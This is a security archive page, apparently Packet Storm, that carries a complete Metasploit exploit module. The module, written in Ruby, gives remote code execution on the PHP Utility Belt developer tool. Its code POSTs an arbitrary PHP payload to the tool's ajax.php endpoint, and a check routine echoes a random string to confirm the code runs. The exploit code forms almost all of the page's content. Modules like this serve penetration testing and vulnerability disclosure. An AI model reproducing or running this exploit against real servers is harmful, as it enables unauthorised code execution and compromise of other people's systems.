PHP Utility Belt Remote Code Execution

PHP Utility Belt Remote Code Execution: Posted Mar 11, 2016; Authored by Jay Turla, WICS | Site metasploit.com; This Metasploit module exploits a remote code execution vulnerability in PHP Utility Belt, which is a set of tools for PHP developers and should not be installed in a production environment, since this application runs arbitrary PHP code as an intended functionality.; tags | exploit, remote, arbitrary, php, code execution; SHA-256 | 2e8528e3811c7d93f83ce9f7eaaa80a6321b298dc7b5c63c52212036dbd43291; Download | Favorite | View

PHP Utility Belt Remote Code Execution

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'PHP Utility Belt Remote Code Execution',
      'Description'    => %q{
         This module exploits a remote code execution vulnerability in PHP Utility Belt,
         which is a set of tools for PHP developers and should not be installed in a
         production environment, since this application runs arbitrary PHP code as an
         intended functionality.
      },
      'Author'         =>
        [
          'WICS',     # initial discovery
          'Jay Turla' # msf
        ],
      'References'     =>
        [
          ['EDB', '38901'],
          ['URL', 'https://github.com/mboynes/php-utility-belt'] # Official Repo
        ],
      'DisclosureDate' => 'Aug 12 2015',
      'License'        => MSF_LICENSE,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 2000,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          ['PHP Utility Belt', {}]
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The path to PHP Utility Belt', '/php-utility-belt/ajax.php'])
      ], self.class)
  end

  def check
    txt = Rex::Text.rand_text_alpha(8)
    res = http_send_command("echo #{txt};")

    if res && res.body.include?(txt)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    http_send_command(payload.encoded)
  end

  def http_send_command(cmd)
    send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path),
      'vars_post' => {
        'code' => cmd
      }
    )
  end

end

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

PHP Utility Belt Remote Code Execution

PHP Utility Belt Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

PHP Utility Belt Remote Code Execution

Share This

PHP Utility Belt Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems